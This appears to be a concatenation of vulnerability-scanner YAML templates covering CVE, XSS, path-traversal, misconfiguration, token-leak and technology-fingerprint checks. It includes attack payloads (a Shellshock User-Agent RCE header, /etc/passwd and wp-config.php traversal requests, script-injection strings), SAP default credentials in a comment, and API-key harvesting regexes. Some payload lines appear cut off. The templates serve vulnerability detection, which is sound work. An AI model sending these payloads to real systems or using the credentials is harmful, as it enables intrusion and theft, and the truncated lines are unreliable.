"{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Could not parse auth token" 17 | part: body 18 | -------------------------------------------------------------------------------- /panels/kubernetes-pods.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-pods-api 2 | info: 3 | name: Kubernetes Pods API 4 | author: ilovebinbash 5 | severity: informative 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}:10250/pods' 10 | matchers: 11 | - type: word 12 | words: 13 | - "apiVersion" 14 | part: body 15 | - type: word 16 | words: 17 | - "application/json" 18 | part: header 19 | -------------------------------------------------------------------------------- /vulnerabilities/rce-shellshock-user-agent.yaml: -------------------------------------------------------------------------------- 1 | id: rce-user-agent-shell-shock 2 | 3 | info: 4 | name: Remote Code Execution Via (User-Agent) 5 | author: 0xelkomy 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | headers: 11 | User-Agent: "{ :;}; echo $(" 19 | part: body 20 | -------------------------------------------------------------------------------- /cves/CVE-2018-7490.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-7490 2 | 3 | info: 4 | name: uWSGI PHP Plugin Directory Traversal 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: regex 17 | regex: 18 | - "root:[x*]:0:0:" 19 | part: body 20 | -------------------------------------------------------------------------------- /files/tomcat-scripts.yaml: -------------------------------------------------------------------------------- 1 | id: tomcat-scripts 2 | 3 | info: 4 | name: Detect Tomcat Exposed Scripts 5 | author: Co0nan 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/examples/servlets/index.html" 12 | - "{{BaseURL}}/examples/jsp/index.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "JSP Examples" 17 | - "JSP Samples" 18 | - "Servlets Examples" 19 | -------------------------------------------------------------------------------- /security-misconfiguration/basic-cors.yaml: -------------------------------------------------------------------------------- 1 | id: basic-cors-misconfig 2 | 3 | info: 4 | name: Basic CORS misconfiguration 5 | author: nadino 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | headers: 13 | Origin: "https://evil.com" 14 | matchers: 15 | - type: word 16 | words: 17 | - "Access-Control-Allow-Origin: https://evil.com" 18 | part: header 19 | -------------------------------------------------------------------------------- /technologies/gitlab-detect.yaml: -------------------------------------------------------------------------------- 1 | id: Gitlab-Detect 2 | 3 | info: 4 | name: Detect Gitlab 5 | author: ehsahil 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/users/sign_in" 12 | - "{{BaseURL}}/users/sign_up" 13 | - "{{BaseURL}}/explore" 14 | matchers: 15 | - type: word 16 | words: 17 | - "GitLab" 18 | - "Register for GitLab" 19 | - "Explore GitLab" 20 | -------------------------------------------------------------------------------- /vulnerabilities/wordpress-duplicator-path-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-duplicator-path-traversal 2 | 3 | info: 4 | name: WordPress duplicator Path Traversal 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php" 12 | matchers: 13 | - type: word 14 | words: 15 | - "DB_NAME" 16 | part: body 17 | -------------------------------------------------------------------------------- /examples/dns-multiple-example.yaml: -------------------------------------------------------------------------------- 1 | id: dns-multiple-example 2 | 3 | info: 4 | name: DNS Multiple test 5 | author: pdteam 6 | severity: info 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 3 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "example-cname.com" 19 | 20 | - type: word 21 | words: 22 | - "NXDOMAIN" 23 | -------------------------------------------------------------------------------- /cves/CVE-2019-19368.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-19368 2 | 3 | info: 4 | name: Rumpus FTP Web File Manager 8.2.9.1 XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/Login?!'>" 19 | part: body 20 | -------------------------------------------------------------------------------- /cves/CVE-2019-8982.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-8982 2 | info: 3 | name: Wavemaker Studio 6.6 LFI/SSRF 4 | author: madrobot 5 | severity: high 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd" 11 | matchers: 12 | - type: status 13 | status: 14 | - 200 15 | - type: regex 16 | regex: 17 | - "root:[x*]:0:0:" 18 | part: body 19 | -------------------------------------------------------------------------------- /cves/CVE-2020-8115.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-8115 2 | 3 | info: 4 | name: Revive Adserver XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"" 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: word 17 | words: 18 | - "alert(1337)" 19 | part: body 20 | -------------------------------------------------------------------------------- /panels/sap-netweaver-detect.yaml: -------------------------------------------------------------------------------- 1 | id: sap-netweaver-portal-detect 2 | 3 | info: 4 | name: SAP NetWeaver Portal detect 5 | author: organiccrap 6 | severity: informative 7 | # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2& 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/irj/portal" 13 | matchers: 14 | - type: word 15 | words: 16 | - "SAP NetWeaver Portal" 17 | part: body 18 | -------------------------------------------------------------------------------- /vulnerabilities/moodle-filter-jmol-xss.yaml: -------------------------------------------------------------------------------- 1 | id: moodle-filter-jmol-xss 2 | 3 | info: 4 | name: Moodle filter_jmol XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//" 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: word 17 | words: 18 | - '\"};alert(1337);//' 19 | part: body 20 | -------------------------------------------------------------------------------- /cves/CVE-2019-3799.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-3799 2 | info: 3 | name: Spring-Cloud-Config-Server Directory Traversal 4 | author: madrobot 5 | severity: high 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd" 11 | matchers: 12 | - type: status 13 | status: 14 | - 200 15 | - type: regex 16 | regex: 17 | - 'root:[x*]:0:0:' 18 | part: body 19 | -------------------------------------------------------------------------------- /vulnerabilities/discourse-xss.yaml: -------------------------------------------------------------------------------- 1 | id: Discourse XSS 2 | 3 | info: 4 | name: Discourse CMS XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\">' 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: word 17 | words: 18 | - "" 19 | part: body 20 | -------------------------------------------------------------------------------- /security-misconfiguration/front-page-misconfig.yaml: -------------------------------------------------------------------------------- 1 | id: front-page-misconfig 2 | 3 | info: 4 | name: FrontPage configuration information discloure 5 | author: JTeles 6 | severity: low 7 | # reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/_vti_inf.html" 13 | matchers: 14 | - type: size 15 | size: 16 | - 247 17 | -------------------------------------------------------------------------------- /tokens/google-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: google-api-key 2 | 3 | info: 4 | name: Google API Key 5 | author: Swissky 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | matchers: 13 | - type: regex 14 | part: body 15 | regex: 16 | - "AIza[0-9A-Za-z\\-_]{35}" 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - "AIza[0-9A-Za-z\\-_]{35}" 22 | -------------------------------------------------------------------------------- /vulnerabilities/wordpress-wordfence-xss.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-wordfence-xss 2 | 3 | info: 4 | name: WordPress Wordfence 7.4.6 Cross Site Scripting 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E" 12 | matchers: 13 | - type: word 14 | words: 15 | - "" 16 | part: body 17 | -------------------------------------------------------------------------------- /dns/dead-host-with-cname.yaml: -------------------------------------------------------------------------------- 1 | id: dead-host-with-cname 2 | 3 | info: 4 | name: dead-host-with-cname 5 | author: pdnuclei - projectdiscovery.io 6 | severity: informative 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 5 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "NXDOMAIN" 19 | 20 | - type: word 21 | words: 22 | - "IN\tCNAME" 23 | -------------------------------------------------------------------------------- /files/apc_info.yaml: -------------------------------------------------------------------------------- 1 | id: apcu-service 2 | 3 | info: 4 | name: APCu service information leakage 5 | author: koti2 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/apc/apc.php" 12 | - "{{BaseURL}}/apc.php" 13 | matchers: 14 | - type: word 15 | words: 16 | - "APCu Version Information" 17 | - "General Cache Information" 18 | - "Detailed Memory Usage and Fragmentation" 19 | condition: or 20 | -------------------------------------------------------------------------------- /cves/CVE-2019-19908.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-19908 2 | 3 | info: 4 | name: phpMyChat-Plus XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C" 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: word 17 | words: 18 | - "" 19 | part: body 20 | -------------------------------------------------------------------------------- /technologies/jaspersoft-detect.yaml: -------------------------------------------------------------------------------- 1 | id: Jaspersoft-detect 2 | 3 | info: 4 | name: Jaspersoft detected 5 | author: koti2 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/jasperserver/login.html?error=1" 12 | matchers: 13 | - type: word 14 | words: 15 | - "TIBCO Jaspersoft: Login" 16 | - "Could not login to JasperReports Server" 17 | - "About TIBCO JasperReports Server" 18 | condition: or 19 | -------------------------------------------------------------------------------- /cves/CVE-2018-18069.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-18069 2 | 3 | info: 4 | name: Wordpress unauthenticated stored xss 5 | author: nadino 6 | severity: medium 7 | 8 | requests: 9 | - method: POST 10 | path: 11 | - "{{BaseURL}}/wp-admin/admin.php" 12 | body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\">alert(1337)" 16 | part: body 17 | -------------------------------------------------------------------------------- /vulnerabilities/moodle-filter-jmol-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: moodle-filter-jmol-lfi 2 | 3 | info: 4 | name: Moodle filter_jmol LFI 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd" 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: regex 17 | regex: 18 | - "root:[x*]:0:0:" 19 | part: body 20 | -------------------------------------------------------------------------------- /cves/CVE-2018-20824.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-20824 2 | 3 | info: 4 | name: Atlassian Jira WallboardServlet XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)" 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: word 17 | words: 18 | - alert(document.domain) 19 | part: body 20 | -------------------------------------------------------------------------------- /files/docker-registry.yaml: -------------------------------------------------------------------------------- 1 | id: docker-registry 2 | 3 | info: 4 | name: Docker Registry Listing 5 | author: puzzlepeaches 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/v2/_catalog" 12 | redirects: true 13 | max-redirects: 1 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - '"repositories":' 19 | - type: word 20 | words: 21 | - "application/json" 22 | part: header 23 | -------------------------------------------------------------------------------- /tokens/mailchimp-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: mailchimp-access-key-value 2 | 3 | info: 4 | name: Mailchimp API Value 5 | author: puzzlepeaches 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | matchers: 13 | - type: regex 14 | part: body 15 | regex: 16 | - "[0-9a-f]{32}-us[0-9]{1,2}" 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - "[0-9a-f]{32}-us[0-9]{1,2}" 22 | -------------------------------------------------------------------------------- /files/elasticsearch.yaml: -------------------------------------------------------------------------------- 1 | id: elasticsearch 2 | 3 | info: 4 | name: ElasticSearch Information Disclosure 5 | author: Shine 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/_cat/indices?v' 12 | - '{{BaseURL}}:9200/_cat/indices?v' 13 | - '{{BaseURL}}/_all/_search' 14 | - '{{BaseURL}}:9200/_all/_search' 15 | matchers: 16 | - type: word 17 | words: 18 | - '"took":' 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /dns/cname-service-detector.yaml: -------------------------------------------------------------------------------- 1 | id: cname-service-detector 2 | 3 | info: 4 | name: 3rd party service checker 5 | author: bauthard 6 | severity: informative 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: CNAME 11 | class: inet 12 | recursion: true 13 | retries: 5 14 | matchers-condition: or 15 | matchers: 16 | - type: word 17 | name: zendesk 18 | words: 19 | - "zendesk.com" 20 | - type: word 21 | name: github 22 | words: 23 | - "github.io" 24 | -------------------------------------------------------------------------------- /panels/pulse-secure-panel.yaml: -------------------------------------------------------------------------------- 1 | id: pulse-secure-panel 2 | 3 | info: 4 | name: Pulse Secure VPN Panel 5 | author: bsysop 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" 12 | matchers-condition: or 13 | matchers: 14 | - type: word 15 | words: 16 | - "/dana-na/auth/welcome.cgi" 17 | part: header 18 | 19 | - type: word 20 | words: 21 | - "/dana-na/css/ds.css" 22 | part: body 23 | -------------------------------------------------------------------------------- /cves/CVE-2019-5418.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-5418 2 | 3 | info: 4 | name: File Content Disclosure on Rails 5 | author: omarkurt 6 | severity: medium 7 | # reference: https://github.com/omarkurt/CVE-2019-5418 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | headers: 14 | Accept: ../../../../../../../../etc/passwd{{ 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0:" 22 | part: body 23 | -------------------------------------------------------------------------------- /cves/CVE-2019-14974.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-14974 2 | 3 | info: 4 | name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting 5 | author: madrobot 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://" 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: word 17 | words: 18 | - "url = window.location.search.split(\"?desktop_url=\")[1]" 19 | part: body 20 | -------------------------------------------------------------------------------- /files/wadl-files.yaml: -------------------------------------------------------------------------------- 1 | id: wadl-files 2 | 3 | info: 4 | name: wadl file disclosure 5 | author: 0xrudra 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/application.wadl" 12 | - "{{BaseURL}}/service?Wsdl" 13 | matchers: 14 | - type: word 15 | words: 16 | - "This is simplified WADL with user and core resources only" 17 | - "\"http://jersey.java.net/\"" 18 | - "http://wadl.dev.java.net/2009/02" 19 | condition: or 20 | part: body 21 | -------------------------------------------------------------------------------- /vulnerabilities/x-forwarded-host-injection.yaml: -------------------------------------------------------------------------------- 1 | id: host-header-injection 2 | 3 | info: 4 | name: Host Header Injection (x-forwarded-host) 5 | author: melbadry9 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | # Example of sending some headers to the servers 11 | headers: 12 | # MD5 hash of melbadry9 13 | X-Forwarded-Host: "0021e78f48fe6525798294b7711c6f72.com" 14 | path: 15 | - "{{BaseURL}}/" 16 | matchers: 17 | - type: word 18 | words: 19 | - "0021e78f48fe6525798294b7711c6f72" 20 | -------------------------------------------------------------------------------- /cves/CVE-2018-19439.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-19439 2 | 3 | info: 4 | name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow> 181 | condition: or 182 | part: body 183 | - type: regex 184 | name: moodle 185 | regex: 186 | - ]+moodlelogo 187 | condition: or 188 | part: body 189 | - type: regex 190 | name: minibb 191 | regex: 192 | - [^<]+\n 218 | condition: or 219 | part: body 220 | - type: regex 221 | name: woocommerce 222 | regex: 223 | - 259 | - 260 | condition: or 261 | part: body 262 | - type: regex 263 | name: youtrack 264 | regex: 265 | - no-title="YouTrack"> 266 | - data-reactid="[^"]+">youTrack ([0-9.]+)< 267 | - type="application/opensearchdescription\+xml" title="YouTrack"/> 268 | condition: or 269 | part: body 270 | - type: regex 271 | name: grandnode 272 | regex: 273 | - "(?: 317 | condition: or 318 | part: body 319 | - type: regex 320 | name: jsdelivr 321 | regex: 322 | - <[^>]+?//cdn\.jsdelivr\.net/ 323 | condition: or 324 | part: body 325 | - type: regex 326 | name: user.com 327 | regex: 328 | - ]+/id="ue_widget" 329 | condition: or 330 | part: body 331 | - type: regex 332 | name: smart-ad-server 333 | regex: 334 | - ]+smartadserver\.com\/call 335 | condition: or 336 | part: body 337 | - type: regex 338 | name: wordpress-super-cache 339 | regex: 340 | - 437 | - ]+(?:typolight|contao)\.css 438 | condition: or 439 | part: body 440 | - type: regex 441 | name: wpcache 442 | regex: 443 | - 561 | condition: or 562 | part: body 563 | - type: regex 564 | name: boldgrid 565 | regex: 566 | - ]+boldgrid 567 | - ]+post-and-page-builder 568 | - ]+s\d+\.boldgrid\.com 569 | condition: or 570 | part: body 571 | - type: regex 572 | name: zurb-foundation 573 | regex: 574 | - ]+foundation[^>"]+css 575 | -
]*class="[^"]*(?:small|medium|large)-\d{1,2} columns 576 | condition: or 577 | part: body 578 | - type: regex 579 | name: shoptet 580 | regex: 581 | - ]*href="https?://cdn\.myshoptet\.com/ 582 | condition: or 583 | part: body 584 | - type: regex 585 | name: phpalbum 586 | regex: 587 | - 588 | condition: or 589 | part: body 590 | - type: regex 591 | name: rbs-change 592 | regex: 593 | - ]+xmlns:change= 594 | condition: or 595 | part: body 596 | - type: regex 597 | name: appnexus 598 | regex: 599 | - <(?:iframe|img)[^>]+adnxs\.(?:net|com) 600 | condition: or 601 | part: body 602 | - type: regex 603 | name: lightbox 604 | regex: 605 | - ]*href="[^"]+lightbox(?:\.min)?\.css 606 | condition: or 607 | part: body 608 | - type: regex 609 | name: shopware 610 | regex: 611 | - Shopware ([\d\.]+) [^<]+ 612 | condition: or 613 | part: body 614 | - type: regex 615 | name: webmine 616 | regex: 617 | - <iframe[^>]+src=[\'"]https://webmine\.cz/miner\?key= 618 | condition: or 619 | part: body 620 | - type: regex 621 | name: fluxbb 622 | regex: 623 | - <p id="poweredby">[^<]+<a href="https?://fluxbb\.org/"> 624 | condition: or 625 | part: body 626 | - type: regex 627 | name: gemius 628 | regex: 629 | - <a [^>]*onclick="gemius_hit 630 | condition: or 631 | part: body 632 | - type: regex 633 | name: sql-buddy 634 | regex: 635 | - (?:<title>SQL Buddy|<[^>]+onclick="sideMainClick\("home\.php) 636 | condition: or 637 | part: body 638 | - type: regex 639 | name: jenkins 640 | regex: 641 | - Jenkins ver\. ([\d.]+) 642 | condition: or 643 | part: body 644 | - type: regex 645 | name: t-soft 646 | regex: 647 | - 648 | condition: or 649 | part: body 650 | - type: regex 651 | name: datocms 652 | regex: 653 | - <[^>]+https://www\.datocms-assets\.com 654 | condition: or 655 | part: body 656 | - type: regex 657 | name: sonarqubes 658 | regex: 659 | - ]*src="[^/]*//[^/]*serving-sys\.com/) 667 | condition: or 668 | part: body 669 | - type: regex 670 | name: koken 671 | regex: 672 | - 673 | - 815 | condition: or 816 | part: body 817 | - type: regex 818 | name: meebo 819 | regex: 820 | - (?: 1627 | - 1628 | condition: or 1629 | part: body 1630 | - type: regex 1631 | name: a-frame 1632 | regex: 1633 | - ]*> 1634 | condition: or 1635 | part: body 1636 | - type: regex 1637 | name: dreamweaver 1638 | regex: 1639 | - 1704 | - 1705 | - ]+atlassian\.com/(?:software/jira|jira-bug-tracking/)[^>]+>Atlassian\s+JIRA(?:[^v]*v(?:ersion: )?(\d+\.\d+(?:\.\d+)?))?' 1712 | condition: or 1713 | part: body 1714 | - type: regex 1715 | name: sdl-tridion 1716 | regex: 1717 | - ]+_tcm\d{2,3}-\d{6}\. 1718 | condition: or 1719 | part: body 1720 | - type: regex 1721 | name: microsoft-publisher 1722 | regex: 1723 | - (?:]*xmlns:w="urn:schemas-microsoft-com:office:publisher"|\s*<\/div> 2038 | condition: or 2039 | part: body 2040 | - type: regex 2041 | name: rebelmouse 2042 | regex: 2043 | - 2141 | condition: or 2142 | part: body 2143 | - type: regex 2144 | name: cargo 2145 | regex: 2146 | - ]+Cargo feed 2147 | condition: or 2148 | part: body 2149 | - type: regex 2150 | name: sentry 2151 | regex: 2152 | - ']*>\s*Raven\.config\(''[^'']*'', \{\s+release: ''([0-9\.]+)''' 2153 | condition: or 2154 | part: body 2155 | - type: regex 2156 | name: visual-website-optimizer 2157 | regex: 2158 | - 2159 | condition: or 2160 | part: body 2161 | - type: regex 2162 | name: twiki 2163 | regex: 2164 | - ]*(?:title|alt)="This site is powered by the TWiki collaboration platform 2165 | condition: or 2166 | part: body 2167 | - type: regex 2168 | name: javadoc 2169 | regex: 2170 | - 2171 | condition: or 2172 | part: body 2173 | - type: regex 2174 | name: tamago 2175 | regex: 2176 | - ]*href="http://tamago\.temonalab\.com 2177 | condition: or 2178 | part: body 2179 | - type: regex 2180 | name: haddock 2181 | regex: 2182 | -

Produced by Haddock version ([0-9.]+)

2183 | condition: or 2184 | part: body 2185 | - type: regex 2186 | name: lightmon-engine 2187 | regex: 2188 | - 2344 | condition: or 2345 | part: body 2346 | - type: regex 2347 | name: roundcube 2348 | regex: 2349 | - RoundCube 2350 | condition: or 2351 | part: body 2352 | - type: regex 2353 | name: advanced-web-stats 2354 | regex: 2355 | - aws\.src = [^<]+caphyon-analytics 2356 | condition: or 2357 | part: body 2358 | - type: regex 2359 | name: riskified 2360 | regex: 2361 | - <[^>]*beacon\.riskified\.com 2362 | - <[^>]*c\.riskified\.com 2363 | condition: or 2364 | part: body 2365 | - type: regex 2366 | name: dnn 2367 | regex: 2368 | - <!-- by DotNetNuke Corporation 2369 | - <!-- DNN Platform 2370 | condition: or 2371 | part: body 2372 | - type: regex 2373 | name: w3-total-cache 2374 | regex: 2375 | - <!--[^>]+W3 Total Cache 2376 | condition: or 2377 | part: body 2378 | - type: regex 2379 | name: tessitura 2380 | regex: 2381 | - '<!--[^>]+Tessitura Version: (\d*\.\d*\.\d*)?' 2382 | condition: or 2383 | part: body 2384 | - type: regex 2385 | name: synology-diskstation 2386 | regex: 2387 | - <noscript><div class='syno-no-script' 2388 | condition: or 2389 | part: body 2390 | - type: regex 2391 | name: whooshkaa 2392 | regex: 2393 | - <iframe src="[^>]+whooshkaa\.com 2394 | condition: or 2395 | part: body 2396 | - type: regex 2397 | name: cubecart 2398 | regex: 2399 | - (?:Powered by <a href=[^>]+cubecart\.com|<p[^>]+>Powered by CubeCart) 2400 | condition: or 2401 | part: body 2402 | - type: regex 2403 | name: powergap 2404 | regex: 2405 | - <a[^>]+title="POWERGAP 2406 | - <input type="hidden" name="shopid" 2407 | condition: or 2408 | part: body 2409 | - type: regex 2410 | name: amcharts 2411 | regex: 2412 | - <svg[^>]*><desc>JavaScript chart by amCharts ([\d.]*) 2413 | condition: or 2414 | part: body 2415 | - type: regex 2416 | name: webflow 2417 | regex: 2418 | - <html[^>]+data-wf-site 2419 | condition: or 2420 | part: body 2421 | - type: regex 2422 | name: dokuwiki 2423 | regex: 2424 | - <div[^>]+id="dokuwiki__> 2425 | - <a[^>]+href="#dokuwiki__ 2426 | condition: or 2427 | part: body 2428 | - type: regex 2429 | name: jquery-pjax 2430 | regex: 2431 | - <div[^>]+data-pjax-container 2432 | condition: or 2433 | part: body 2434 | - type: regex 2435 | name: phpdocumentor 2436 | regex: 2437 | - <!-- Generated by phpDocumentor 2438 | condition: or 2439 | part: body 2440 | - type: regex 2441 | name: owncloud 2442 | regex: 2443 | - <a href="https://owncloud\.com" target="_blank">ownCloud Inc\.</a><br/>Your Cloud, Your Data, Your Way! 2444 | condition: or 2445 | part: body 2446 | - type: regex 2447 | name: hexo 2448 | regex: 2449 | - Powered by <a href="https?://hexo\.io/?"[^>]*>Hexo</ 2450 | condition: or 2451 | part: body 2452 | - type: regex 2453 | name: atlassian-bitbucket 2454 | regex: 2455 | - <li>Atlassian Bitbucket <span title="[a-z0-9]+" id="product-version" data-commitid="[a-z0-9]+" data-system-build-number="[a-z0-9]+"> v([\d.]+)< 2456 | condition: or 2457 | part: body 2458 | - type: regex 2459 | name: phppgadmin 2460 | regex: 2461 | - (?:<title>phpPgAdmin|phpPgAdmin) 2462 | condition: or 2463 | part: body 2464 | - type: regex 2465 | name: adnegah 2466 | regex: 2467 | -